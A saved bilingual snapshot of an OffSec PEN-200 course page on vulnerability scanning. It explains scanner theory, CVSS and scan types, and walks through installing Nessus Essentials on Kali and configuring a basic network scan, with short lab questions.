這是用戶在 2024-7-21 16:42 為 https://portal.offsec.com/courses/pen-200-44065/learning/vulnerability-scanning-48659/vulnerability-... 保存的雙語快照頁面,由 沉浸式翻譯 提供雙語支持。了解如何保存?
logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

logo

Are you sure to stop exam tracking?

PEN-200

23.4
(access will end on December 27th 2024, 08:00 AM. )
Training material
Challenge Labs
Exam
Text 發簡訊
Videos 視頻

PEN-200: 7. Vulnerability Scanning
PEN-200: 7. 漏洞掃描

7. Vulnerability Scanning
7. 漏洞掃描
7.1. Vulnerability Scanning Theory
7.1. 漏洞掃描理論
7.1.1. How Vulnerability Scanners Work
7.1.2. Types of Vulnerability Scans
7.1.3. Things to consider in a Vulnerability Scan
7.2. Vulnerability Scanning with Nessus
7.2. 使用 Nessus 進行漏洞掃描
7.2.1. Installing Nessus 7.2.1. 安裝 Nessus
7.2.2. Nessus Components 7.2.2. Nessus 元件
7.2.3. Performing a Vulnerability Scan
7.2.3. 執行漏洞掃描
7.2.4. Analyzing the Results
7.2.4. 分析結果
7.2.5. Performing an Authenticated Vulnerability Scan
7.2.5. 執行經過身份驗證的漏洞掃描
7.2.6. Working with Nessus Plugins
7.2.6. 使用 Nessus 外掛程式
7.3. Vulnerability Scanning with Nmap
7.3. 使用 Nmap 掃描漏洞
7.3.1. NSE Vulnerability Scripts
7.3.1. NSE 漏洞腳本
7.3.2. Working with NSE Scripts
7.3.2. 使用 NSE 腳本
7.4. Wrapping Up 7.4. 結束語
My Kali 我的卡利
VPN VPN的

7. Vulnerability Scanning
7. 漏洞掃描

In this Learning Module, we will cover the following Learning Units:
在本學習模組中,我們將涵蓋以下學習單元:

  • Vulnerability Scanning Theory
    漏洞掃描理論
  • Vulnerability Scanning with Nessus
    使用 Nessus 進行漏洞掃描
  • Vulnerability Scanning with Nmap
    使用 Nmap 進行漏洞掃描

The discovery of vulnerabilities is an integral part of any security assessment. The process of identifying the attack surface of a piece of software, system, or network is called Vulnerability Scanning.
漏洞的發現是任何安全評估的一個組成部分。識別軟體、系統或網路的攻擊面的過程稱為漏洞掃描。

Vulnerability scanners come in many different forms, from individual scripts that identify a single vulnerability to complex commercial solutions that scan a broad variety of vulnerabilities. Automated vulnerability scanners can be invaluable for penetration testers as they help quickly establish a baseline on the target network before performing a more thorough manual testing analysis to get adequate coverage. Common types of vulnerability scanners are web application and network vulnerability scanners.
漏洞掃描程式有許多不同的形式,從識別單個漏洞的單個腳本到掃描各種漏洞的複雜商業解決方案。自動漏洞掃描程式對於滲透測試人員來說非常寶貴,因為它們有助於在執行更徹底的手動測試分析以獲得足夠的覆蓋範圍之前快速建立目標網路的基線。漏洞掃描程式的常見類型是 Web 應用程式和網路漏洞掃描程式。

In this Module, we will analyze automated network vulnerability scanning. We'll begin with the theory behind vulnerability scanning and then use Nessus and Nmap to perform different kinds of vulnerability scans.
在本模組中,我們將分析自動網路漏洞掃描。我們將從漏洞掃描背後的理論開始,然後使用 Nessus 和 Nmap 執行不同類型的漏洞掃描。

7.1. Vulnerability Scanning Theory
7.1. 漏洞掃描理論

This Learning Unit covers the following Learning Objectives:
本學習單元涵蓋以下學習目標:

  • Gain a basic understanding of the vulnerability scanning process
    基本瞭解漏洞掃描過程
  • Learn about the different types of vulnerability scans
    瞭解不同類型的漏洞掃描
  • Understand the considerations of a vulnerability scan
    瞭解漏洞掃描的注意事項

In this Learning Unit, we'll discuss the theory behind vulnerability scanning. Before inspecting our tools, we need to outline the basic workflow of a vulnerability scanner and understand how it finds vulnerabilities. We will also review the different types and considerations of a vulnerability scan.
在本學習單元中,我們將討論漏洞掃描背後的理論。在檢查我們的工具之前,我們需要概述漏洞掃描程式的基本工作流程,並瞭解它如何發現漏洞。我們還將回顧漏洞掃描的不同類型和注意事項。

7.1.1. How Vulnerability Scanners Work
7.1.1. 漏洞掃描程式的工作原理

Every vulnerability scanner has its own customized workflow but the basic process behind vulnerability scanning is implementation-independent. The basic process of an automated vulnerability scanner can be described as:
每個漏洞掃描程式都有自己的自定義工作流程,但漏洞掃描背後的基本過程與實現無關。自動漏洞掃描程式的基本過程可以描述為:

  1. Host discovery 主機發現
  2. Port scanning 埠掃描
  3. Operating system, service, and version detection
    操作系統、服務和版本檢測
  4. Matching the results to a vulnerability database
    將結果與漏洞資料庫匹配

Host Discovery tells the scanner if the target is up and responding. The scanner then uses various techniques to identify all open ports on the system and detect all remotely accessible services with corresponding versions. In addition, operating system detection will be done in this step.
Host Discovery 會告知掃描程式目標是否已啟動並有回應。然後,掃描程式使用各種技術來識別系統上的所有開放埠,並檢測具有相應版本的所有遠端訪問服務。此外,操作系統檢測將在此步驟中完成。

Based on all gathered information, the vulnerability scanner will then query a vulnerability database to match the found data to vulnerabilities. Examples of vulnerability databases are the National Vulnerability Database and the Common Vulnerabilities and Exposures (CVE) program.
然後,根據收集到的所有資訊,漏洞掃描程式將查詢漏洞資料庫,以將發現的數據與漏洞進行匹配。漏洞資料庫的範例包括國家漏洞資料庫和常見漏洞披露 (CVE) 計劃。

Most commercial vulnerability scanners also have the functionality to verify found vulnerabilities by attempting to partially or fully exploit them. This can significantly reduce missed vulnerabilities but can impact the stability of the service or system.
大多數商業漏洞掃描程式還具有通過嘗試部分或全部利用漏洞來驗證發現的漏洞的功能。這可以顯著減少遺漏的漏洞,但可能會影響服務或系統的穩定性。

Vulnerabilities are identified by the CVE system. While this allows us to identify and find verified vulnerabilities, the CVE identifier provides no information about the severity of a vulnerability.
漏洞由 CVE 系統識別。雖然這使我們能夠識別和查找已驗證的漏洞,但 CVE 標識碼不提供有關漏洞嚴重性的資訊。

The Common Vulnerability Scoring System (CVSS) is a framework for addressing the characteristics and severity of vulnerabilities. Each CVE has a CVSS score assigned. The two major versions are CVSS v2 and CVSS v3. Both versions use a range from 0 to 10 to rate vulnerabilities with different severity labels. The following figure from the National Institute of Standards and Technology (NIST) lists the range of the base score and associated severity for CVSS v2.0 and CVSS v3.0.
通用漏洞評分系統 (CVSS) 是用於解決漏洞特徵和嚴重性的框架。每個 CVE 都分配了一個 CVSS 分數。兩個主要版本是 CVSS v2 和 CVSS v3。這兩個版本都使用從 0 到 10 的範圍來對具有不同嚴重性標籤的漏洞進行評級。美國國家標準與技術研究院 (NIST) 的下圖列出了 CVSS v2.0 和 CVSS v3.0 的基本分數範圍和相關嚴重性。

Figure 1: CVSS Ratings
Figure 1: CVSS Ratings
圖 1:CVSS 評級

To obtain a CVSS score, we can review the CVE in a vulnerability database, or if there is no CVE assigned, we can use a CVSS calculator. In 2019, CVSS v3.1 was released, which clarified and improved the existing version.
要獲得 CVSS 分數,我們可以查看漏洞資料庫中的 CVE,或者如果沒有分配 CVE,我們可以使用 CVSS 計算機。2019年,CVSS v3.1 發佈,對現有版本進行了澄清和改進。

We need to be aware that the results of a vulnerability scan can be incomplete or contain wrongfully detected vulnerabilities.
我們需要意識到,漏洞掃描的結果可能不完整或包含錯誤檢測到的漏洞。

A false positive occurs when a vulnerability is detected but the target is not vulnerable. This can happen through a wrong service and version detection or a configuration that makes the target unexploitable. False positives can also occur when patches or updates are backported, meaning that security fixes are applied to an older version of software.
當檢測到漏洞但目標不容易受到攻擊時,會發生誤報。這可能是通過錯誤的服務和版本檢測或使目標無法利用的配置發生的。向後移植補丁或更新時,也可能會發生誤報,這意味著安全修補程式將應用於舊版本的軟體。

False negative is another important term. It occurs when a vulnerability is missed by the vulnerability scanner.
假陰性是另一個重要術語。當漏洞掃描程式遺漏漏洞時,就會發生這種情況。

In a penetration test, we often need to find the right balance between manual and automated vulnerability scanning. Let's explore both options briefly.
在滲透測試中,我們經常需要在手動和自動漏洞掃描之間找到適當的平衡。讓我們簡要探討一下這兩種選擇。

A manual vulnerability scan will inevitably be very resource-intensive and time-consuming. When there is a huge amount of data to analyze, we often reach our cognitive limit quickly and overlook vital details. On the other hand, manual vulnerability scanning allows for the discovery of complex and logical vulnerabilities that are rather difficult to discover using any type of automated scanner.
手動漏洞掃描將不可避免地非常耗費資源和時間。當有大量數據需要分析時,我們往往會很快達到認知極限,而忽略了重要的細節。另一方面,手動漏洞掃描允許發現複雜和邏輯漏洞,這些漏洞使用任何類型的自動掃描程式都很難發現。

Automated vulnerability scans are invaluable when working on engagements for a multitude of reasons. First, in nearly all types of assessments, we have time constraints. Therefore, when we have a big enterprise network to scan, we cannot manually review every system. This is especially true when thinking about new or complex vulnerabilities. Second, by using automated scanners, we can quickly identify easily-detected vulnerabilities and other low-hanging fruit.
出於多種原因,在處理專案時,自動漏洞掃描非常寶貴。首先,在幾乎所有類型的評估中,我們都有時間限制。因此,當我們要掃描大型企業網路時,我們無法手動檢查每個系統。在考慮新的或複雜的漏洞時尤其如此。其次,通過使用自動掃描器,我們可以快速識別容易檢測到的漏洞和其他唾手可得的成果。

We should take the time to explore the inner workings of every automated tool we plan to use in a security assessment. This will not only assist us in configuring the tool and digesting the results properly, but doing that will help us understand the limitations that must be overcome with manually applied expertise.
我們應該花時間探索我們計劃在安全評估中使用的每個自動化工具的內部工作原理。這不僅有助於我們配置工具並正確消化結果,而且這樣做將幫助我們瞭解手動應用專業知識必須克服的局限性。

Labs 實驗室

  1. Is this a false positive or a false negative? A vulnerability scanner identifies a vulnerability for a Linux web server. The target runs on Windows and the vulnerability is only exploitable on Linux.
  1. Is this a false positive or a false negative? A vulnerability scanner detects the wrong version of an FTP service. The detected version has no vulnerabilities, but the running FTP service is vulnerable.

7.1.2. Types of Vulnerability Scans
7.1.2. 漏洞掃描的類型

In this section, we will examine internal and external as well as unauthenticated and authenticated vulnerability scans.
在本節中,我們將檢查內部和外部以及未經身份驗證和經過身份驗證的漏洞掃描。

The location where we perform the vulnerability scan determines the target visibility. If a client tasks us with an external vulnerability scan, they mean to analyze one or more systems that are accessible from the internet. Targets in an external vulnerability scan are often web applications, systems in the demilitarized zone(DMZ), and public-facing services.
我們執行漏洞掃描的位置決定了目標可見性。如果客戶向我們分配外部漏洞掃描任務,他們的意思是分析一個或多個可從互聯網訪問的系統。外部漏洞掃描的目標通常是 Web 應用程式、非軍事區 (DMZ) 中的系統和面向公眾的服務。

The client intends to get an overview of the security status of all systems that are accessible by an external attacker. In most cases, we get a list of IP addresses the client wants us to scan but occasionally, they want us to map all external accessible systems and services by ourselves. While a company should always know which of their systems are publicly accessible, it's not always the case. As a result, we will often find externally exposed sensitive systems and services that the company is not aware of.
用戶端打算大致瞭解外部攻擊者可訪問的所有系統的安全狀態。在大多數情況下,我們會得到客戶希望我們掃描的IP位址清單,但有時,他們希望我們自己映射所有外部可訪問的系統和服務。雖然公司應該始終知道他們的哪些系統是可公開訪問的,但情況並非總是如此。因此,我們經常會發現公司不知道的外部暴露的敏感系統和服務。

On the other hand, there is the internal vulnerability scan where we have direct access to either a part of or the complete internal network of a client. When a client tasks us with this kind of vulnerability scan, we either get VPN access or perform the scan on-site. The intention is to get an overview of the security status of the internal network. It is important to analyze which vectors an attacker can use after breaching the perimeter.
另一方面,有內部漏洞掃描,我們可以直接訪問用戶端的一部分或整個內部網路。當客戶向我們分配此類漏洞掃描任務時,我們要麼獲得 VPN 訪問許可權,要麼在現場執行掃描。目的是大致了解內部網路的安全狀態。分析攻擊者在突破邊界后可以使用哪些向量非常重要。

The next two scan types we will examine are authenticated and unauthenticated vulnerability scans. When we perform a vulnerability scan on a system without providing credentials, it is called an unauthenticated vulnerability scan. Unauthenticated scans are made to find vulnerabilities in remotely accessible services on a target. Therefore, they map the system with all open ports and provide us with an attack surface by matching the information to vulnerability databases as mentioned before.
接下來我們將檢查的兩種掃描類型是經過身份驗證和未經身份驗證的漏洞掃描。當我們在不提供憑據的情況下對系統執行漏洞掃描時,稱為未經身份驗證的漏洞掃描。進行未經身份驗證的掃描是為了查找目標上遠端訪問的服務中的漏洞。因此,它們將系統映射到所有開放埠,並通過將資訊與漏洞資料庫進行匹配來為我們提供攻擊面,如前所述。

However, we get no information about local security flaws, such as missing patches, outdated software, or configuration vulnerabilities on the system itself. For example, in an unauthenticated vulnerability scan on a Windows target, we cannot determine if the system is patched against the HiveNightmare vulnerability, which allows an unprivileged user to read sensitive system files. This is where authenticated scans come into play.

Most scanners can be configured to run authenticated scans, in which the scanner logs in to the target with a set of valid credentials. In most instances, authenticated scans use a privileged user account to have the best visibility into the target system. The goal of authenticated vulnerability scans is to check for vulnerable packages, missing patches, or configuration vulnerabilities.

We will perform both authenticated and unauthenticated scans in the next Learning Unit, but first, let's discuss how to obtain accurate and conclusive results.

Labs

  1. Do you need to perform an authenticated or an unauthenticated vulnerability scan in the following scenario? You want to determine if all current patches on a Linux system are installed.
    在以下情況下,是否需要執行經過身份驗證或未經身份驗證的漏洞掃描?您希望確定是否安裝了 Linux 系統上的所有當前修補程式。
  1. Do you need to perform an authenticated or an unauthenticated vulnerability scan in the following scenario? You want to analyze the perimeter of a server on the internet from the perspective of a malicious actor.
    在以下情況下,是否需要執行經過身份驗證或未經身份驗證的漏洞掃描?您希望從惡意行為者的角度分析互聯網上伺服器的邊界。

7.1.3. Things to consider in a Vulnerability Scan

In this section, we will cover a few things we need to consider when planning and performing a vulnerability scan. In large engagements, we need to configure the vulnerability scanner carefully to get meaningful and relevant results.

The first consideration we'll discuss is the scanning duration. Depending on the scanning type and number of targets, the duration of an automated scan can vary greatly. Because external scans over the internet can be time-consuming due to the number of hops and intermediate systems on the network route, we must plan accordingly if we have a large list of IP addresses.

We also need to discuss target visibility. While it is easy to input an IP address and start the vulnerability scan, we often have to properly consider our targets. It's important to determine if our targets are accessible without the need for any VPNs or permissions in a firewall. In most cases, a client providing a list of IP addresses for an external scan isn't a cause for concern. But if we are single-handedly determining the attack surface of a client's publicly accessible infrastructure, we need to understand that firewalls and other access restriction mechanisms, which could make systems and services inaccessible, might be in place.

For example, an international client has several systems in multiple countries. They restrict access from all IP addresses outside of the country where each system is located. From our location, we are only able to access the systems located in our country while all others are inaccessible to us.

Let's also consider target visibility in an internal engagement. We need to think about our positioning in the network to get meaningful results, especially when we want to scan systems from other subnets. Keep in mind that firewalls, intrusion prevention systems (IPS), and intermediate network devices (such as routers), can filter or alter our traffic. One example of this is when a vulnerability scanner sends ICMP packets in the Host Discovery step and the intermediate device does not forward them. Hence, the scanner marks the target as offline.

In addition, our scan can be affected by rate limiting, which is used to limit the amount of traffic on a network. When our scan exceeds thresholds like throughput, packet count, or connection count, the source system of our vulnerability scan can be drastically restricted in the context of networking capabilities. When the host discovery and service detection probes are rate-limited and therefore slowed down, the vulnerability scanner may miss live hosts or services. Most vulnerability scanners can address this by specifying delays, timeouts, and limiting parallel connections.

Finally, let's review the network and system impact of vulnerability scans. A vulnerability scanner produces a lot of network traffic in most configurations, especially if we want to scan multiple targets in a parallel way. This can easily render a network unusable. To address this, we could reduce the number of parallel scans or the scanning speed. An even bigger problem is the potential impact of our vulnerability scan on the stability of a system. We need to consider that every vulnerability scan can bring instability to any system or service we scan.

Labs

  1. Is the following statement true or false? A vulnerability scan can never impact the stability of a target system or service.
  1. Is the following statement true or false? Rate limiting can be the reason that a vulnerability scanner can flag a live target system as offline.

7.2. Vulnerability Scanning with Nessus
7.2. 使用 Nessus 進行漏洞掃描

This Learning Unit covers the following Learning Objectives:
本學習單元涵蓋以下學習目標:

  • Install Nessus 安裝 Nessus
  • Understand the different Nessus components
    瞭解不同的 Nessus 元件
  • Configure and perform a vulnerability scan
    配置並執行漏洞掃描
  • Understand and work with the results of a vulnerability scan with Nessus
    瞭解並使用 Nessus 進行漏洞掃描的結果
  • Provide credentials to perform an authenticated vulnerability scan
    提供憑據以執行經過身份驗證的漏洞掃描
  • Gain a basic understanding of Nessus plugins
    基本瞭解 Nessus 外掛程式

In this Learning Unit, we'll focus on Nessus, which is one of the most popular vulnerability scanners, containing over 67000 CVEs and 168000 plugins.
在本學習單元中,我們將重點介紹 Nessus,它是最受歡迎的漏洞掃描程式之一,包含超過 67000 個 CVE 和 168000 個外掛程式。

Nessus is available as Nessus Essentials and Nessus Professional. We will use the free version, Nessus Essentials, which comes with some restrictions and constraints. For example, we can only scan 16 different IP addresses, and some templates and functions are not available. However, Nessus Essentials will give us insight into how to use the full commercial version and the general concepts discussed in this section will also apply to most commercial scanners.
Nessus 以 Nessus Essentials 和 Nessus Professional 的形式提供。我們將使用免費版本 Nessus Essentials,它有一些限制和約束。例如,我們只能掃描 16 個不同的 IP 位址,並且某些範本和功能不可用。但是,Nessus Essentials 將讓我們深入瞭解如何使用完整的商業版本,本節中討論的一般概念也適用於大多數商業掃描儀。

7.2.1. Installing Nessus 7.2.1. 安裝 Nessus

For this Learning Unit, we'll need to install Nessus on the Kali Linux VM, which is used to connect to the PEN-200 lab environment. An internet connection and a business email address will be necessary to download and activate Nessus. The minimum hardware requirements Tenable recommends are 4 CPU cores and 8GB of RAM. However, we don't need to meet those requirements for our exercises. 2 CPU cores and 4GB of RAM are sufficient for our needs.
對於此學習單元,我們需要在 Kali Linux VM 上安裝 Nessus,該 VM 用於連接到 PEN-200 實驗室環境。下載和啟動 Nessus 需要互聯網連接和企業電子郵件位址。Tenable 建議的最低硬體要求是 4 個 CPU 內核和 8GB RAM。但是,我們的練習不需要滿足這些要求。2 個 CPU 內核和 4GB RAM 足以滿足我們的需求。

Nessus is not available in the Kali repositories and needs to be installed manually. We can download the current version of Nessus as a 64-bit .deb file for Kali from the Tenable website. There, we also get the SHA256 and MD5 checksums for the installer.
Nessus 在 Kali 儲存庫中不可用,需要手動安裝。我們可以從 Tenable 網站下載當前版本的 Nessus 作為 Kali 的 64 位 .deb 檔。在那裡,我們還獲得了安裝程式的SHA256和MD5校驗和。

Learners using an Apple system with an ARM-based chip can install Nessus on a Kali VM by downloading the installer for the Linux - Ubuntu - arch64 platform.
使用帶有基於 ARM 晶片的 Apple 系統的學習者可以通過下載適用於 Linux - Ubuntu - arch64 平台的安裝程式在 Kali VM 上安裝 Nessus。

Let's select Linux - Debian - amd64 as the platform and download the installer.
讓我們選擇Linux - Debian - amd64 作為平臺並下載安裝程式。

Figure 2: Download Nessus for Kali
Figure 2: Download Nessus for Kali
圖 2:下載適用於 Kali 的 Nessus

After downloading the installer, we'll check the SHA256 checksum to validate it. To do this, we click the Checksum button and copy the SHA256 checksum to the clipboard via the copy icon.

We then echo the copied checksum together with the filename of the installer into a file with the name sha256sum_nessus. Since the button next to the SHA256 checksum only copies the checksum itself, we need to enter the file name manually. The resulting sha256sum_nessus file needs to be in the same directory as the Nessus installer. We will then use sha256sum with the -c parameter to verify the checksum.

kali@kali:~$ cd ~/Downloads

kali@kali:~/Downloads$ echo "4987776fef98bb2a72515abc0529e90572778b1d7aeeb1939179ff1f4de1440d Nessus-10.5.0-debian10_amd64.deb" > sha256sum_nessus

kali@kali:~/Downloads$ sha256sum -c sha256sum_nessus
Nessus-10.5.0-debian10_amd64.deb: OK

Listing 1 - Verifying the checksum
清單 1 - 驗證校驗和

The output shows that the checksums match, which means we can install the package. If there is an updated version of Nessus, the checksum from the previous listing will be different and needs to be adapted.
輸出顯示校驗和匹配,這意味著我們可以安裝該包。如果有 Nessus 的更新版本,則上一個清單的校驗和將有所不同,需要進行調整。

To install the Nessus package, we'll use apt with the install option.
要安裝 Nessus 軟體包,我們將 apt 與 install 選項一起使用。

kali@kali:~/Downloads$ sudo apt install ./Nessus-10.5.0-debian10_amd64.deb
...
Preparing to unpack .../Nessus-10.5.0-debian10_amd64.deb ...
Unpacking nessus (10.5.0) ...
Setting up nessus (10.5.0) ...
...
Unpacking Nessus Scanner Core Components...
 - You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
 - Then go to https://kali:8834/ to configure your scanner

Listing 2 - x64 Nessus installation
清單 2 - x64 Nessus 安裝

After the installation is complete, we can start the nessusd service via systemctl.
安裝完成後,我們可以通過 systemctl 啟動 nessusd 服務。

kali@kali:~/Downloads$ sudo systemctl start nessusd.service

Listing 3 - Starting Nessus
清單 3 - 啟動 Nessus

Once Nessus is running, we can launch a browser and navigate to https://127.0.0.1:8834. We will be presented with a warning indicating an unknown certificate issuer, which is expected due to the use of a self-signed certificate. To accept and trust the self-signed certificate, we can click on Advanced... and then Accept the Risk and Continue.
運行 Nessus 後,我們可以啟動瀏覽器並導航到 https://127.0.0.1:8834。我們將看到一條警告,指示未知的證書頒發者,這是由於使用了自簽名證書而預期的。要接受並信任自簽名證書,我們可以按兩下高級...,然後接受風險並繼續。

Figure 3: Nessus Presenting a Certificate Warning
Figure 3: Nessus Presenting a Certificate Warning

After the page loads, we are prompted to configure pre-installation settings. Let's click on Continue to start the installation with the default settings.

Figure 4: Configuring Pre-Installation Settings
Figure 4: Configuring Pre-Installation Settings

Now, we can select a Nessus product. For this Learning Unit, we'll choose Register for Nessus Essentials and click Continue.

Figure 4: Selecting Nessus Essentials
Figure 4: Selecting Nessus Essentials

Next, we are prompted to request an activation code for Nessus Essentials. We'll provide the required information and click Register.

Figure 5: Requesting an Activation Code
Figure 5: Requesting an Activation Code
圖 5:請求啟動碼

Once we have registered, the activation code is shown in the next window.
註冊后,啟動碼將顯示在下一個視窗中。

Figure 6: Activating Nessus
Figure 6: Activating Nessus

Next, we'll create a local Nessus user account. We'll choose the username admin with a strong password to protect our vulnerability scan results. We'll use these credentials to log in to the Nessus application.

Figure 7: Creating a Local Nessus Account
Figure 7: Creating a Local Nessus Account

Finally, Nessus downloads and compiles all plugins. This can take a significant amount of time to complete.

Figure 8: Downloading Nessus Plugins
Figure 8: Downloading Nessus Plugins

After the plugins are downloaded and installed, we have a working instance of Nessus Essentials.

Labs

  1. Follow the steps above to install Nessus Essentials. What is the command to start the nessusd service after a successful installation from an unprivileged account?

7.2.2. Nessus Components 7.2.2. Nessus 元件

Before we start our first vulnerability scan with Nessus, we'll take some time to get familiar with the core components. When we log in for the first time, we find a welcome window that allows us to enter targets. We can close it without entering anything for now.
在開始使用 Nessus 進行第一次漏洞掃描之前,我們需要一些時間來熟悉核心元件。當我們第一次登錄時,我們會找到一個歡迎視窗,允許我們輸入目標。我們現在可以在不輸入任何內容的情況下關閉它。

First, let's investigate the tabs in the Nessus dashboard. In the Essentials version of Nessus, we have two tabs called Scans and Settings.
首先,讓我們調查一下 Nessus 儀錶板中的選項卡。在 Nessus 的 Essentials 版本中,我們有兩個選項卡,分別稱為「掃描」和「設置」。

Figure 9: Exploring Nessus Settings
Figure 9: Exploring Nessus Settings
圖 9:探索 Nessus 設置

The Settings tab allows us to configure the application. For example, we can enter information for an SMTP server to get scan results via email. The advanced menu allows us to configure global settings ranging from user interface, scan, and log behavior, to security and performance-related options.
「設定」選項卡允許我們配置應用程式。例如,我們可以輸入SMTP伺服器的資訊,以通過電子郵件獲取掃描結果。高級功能表允許我們配置全域設置,從使用者介面、掃描和日誌行為到安全和性能相關選項。

As shown in Figure 9, the About menu lists basic information for Nessus, our license, and how many hosts we have left. For further information on how we can customize and configure Nessus, we can consult the Nessus documentation.
如圖 9 所示,About 功能表列出了 Nessus 的基本資訊、我們的許可證以及我們剩餘的主機數量。有關如何自定義和配置 Nessus 的更多資訊,我們可以查閱 Nessus 文件。

Next, let's examine policies and templates, by clicking on the Scan tab, and then Policies. A policy is a set of predefined configuration options in the context of a Nessus scan. When we save a policy, we can use it as a template for a new scan.

Let's now click on Scan Templates. Nessus already provides a broad variety of scanning templates for us to use. These templates are grouped into the three categories Discovery, Vulnerabilities, and Compliance.

Figure 10: Nessus Policy Templates
Figure 10: Nessus Policy Templates

The Compliance category is only available in the enterprise version as well as the Mobile Device Scan template. The only template in the Discovery category is Host Discovery, which can be used to create a list of live hosts and their open ports.

The Vulnerabilities category consists of templates for critical vulnerabilities or vulnerability groups e.g. PrintNightmare or Zerologon as well as templates for common scanning areas e.g. Web Application Tests or Malware Scans.

Nessus also provides three general vulnerability scanning templates:

  1. The Basic Network Scan performs a full scan with the majority of settings predefined. It will detect a broad variety of vulnerabilities and is therefore the recommended scanning template by Nessus. We also have the option to customize these settings and recommendations.

  2. The Advanced Scan is a template without any predefined settings. We can use this when we want to fully customize our vulnerability scan or if we have specific needs.

  3. The last general scanning template, Advanced Dynamic Scan, also comes without any predefined settings or recommendations.

The biggest difference between the two templates is that in the Advanced Dynamic Scan, we don't need to select plugins manually. The template allows us to configure a dynamic plugin filter instead.

Nessus Plugins are programs written in the Nessus Attack Scripting Language (NASL) that contain the information and the algorithm to detect vulnerabilities. Each plugin is assigned to a plugin family, which covers different use cases. We will work with the Advanced Dynamic Scan template and plugins in the last section of this Learning Unit.

Labs

  1. What is the third group of template categories: DISCOVERY, COMPLIANCE and __________?
  1. Go to the Settings tab in Nessus then click on the Advanced settings. Find how many concurrent web users are allowed with the default settings.

7.2.3. Performing a Vulnerability Scan
7.2.3. 執行漏洞掃描

In this section, we will perform our first vulnerability scan. To begin, let's click on the New Scan button on the dashboard in the Scans tab.
在本節中,我們將執行第一次漏洞掃描。首先,讓我們按兩下儀錶板上的「新掃描」按鈕 掃描 選項卡。

Figure 11: Creating a Scan
Figure 11: Creating a Scan
圖 11:建立掃描

Nessus provides a list of the different templates. For this section, we will use the Basic Network Scan, which we can launch by clicking on it.
Nessus 提供了不同範本的清單。對於本節,我們將使用基本網路掃描,我們可以通過按兩下它來啟動它。

Figure 12: Selecting a Basic Network Scan
Figure 12: Selecting a Basic Network Scan

This will present the scan configuration settings screen containing the BASIC, DISCOVERY, ASSESSMENT, REPORT, and ADVANCED settings.

Figure 13: Different Settings in Scan Configuration
Figure 13: Different Settings in Scan Configuration

The default screen is the General settings page with the two required arguments: a name for our scan and a list of targets. Nessus supports multiple target specifications, including a single IP address, an IP range, and a comma-delimited Fully-Qualified Domain Name (FQDN), or an IP address list.

For this example, we will scan the following machines: POULTRY, JENKINS, WK01, and SAMBA. We will enter "Basic Vulnerability Scan" into the Name field and the IP addresses of the machines into the Targets field.

Figure 14: Configuring Scan Name and Target List
Figure 14: Configuring Scan Name and Target List

Since we chose the Basic Network Scan template, Nessus has already configured most of the settings for us. However, the default configuration might not be exactly what we need. Depending on the scanning type, the environment, time constraints, and the targets, we may need to adapt the settings to fit our needs.

In the default settings of this template, Nessus scans a list of common ports. For this demonstration, we only want to scan ports 80 and 443. To do this, let's click on the Discovery settings and select Custom in the dropdown menu.

Figure 15: Selecting Custom Discovery Settings
Figure 15: Selecting Custom Discovery Settings

The dropdown menu shown in Figure 15 provides us with several predefined options. To scan specific ports, we'll need to select Custom.
圖 15 所示的下拉功能表為我們提供了幾個預定義的選項。要掃描特定埠,我們需要選擇自定義。

After we click on Custom, additional configuration menus appear under the DISCOVERY menu. We can now customize the Basic Network Scan template in the same way as the Advanced Scan template in the context of the DISCOVERY menu. Within the Port Scanning section, we will set the Port scan range to "80,443". Additionally, we'll enable the option the Consider unscanned ports as closed so that Nessus treats other ports as closed` since we are only interested in ports 80 and 443.
按兩下自定義後,其他配置功能表將出現在「發現」功能表下。現在,我們可以在「發現」功能表的上下文中以與「高級掃描」範本相同的方式自定義「基本網路掃描」範本。在「埠掃描」部分中,我們將埠掃描範圍設置為「80,443」。此外,由於我們只對埠 80 和 443 感興趣,因此我們將啟用“將未掃描的埠視為已關閉,以便 Nessus 將其他埠視為已關閉”選項。

Figure 16: Specifying Ports 80 and 443
Figure 16: Specifying Ports 80 and 443

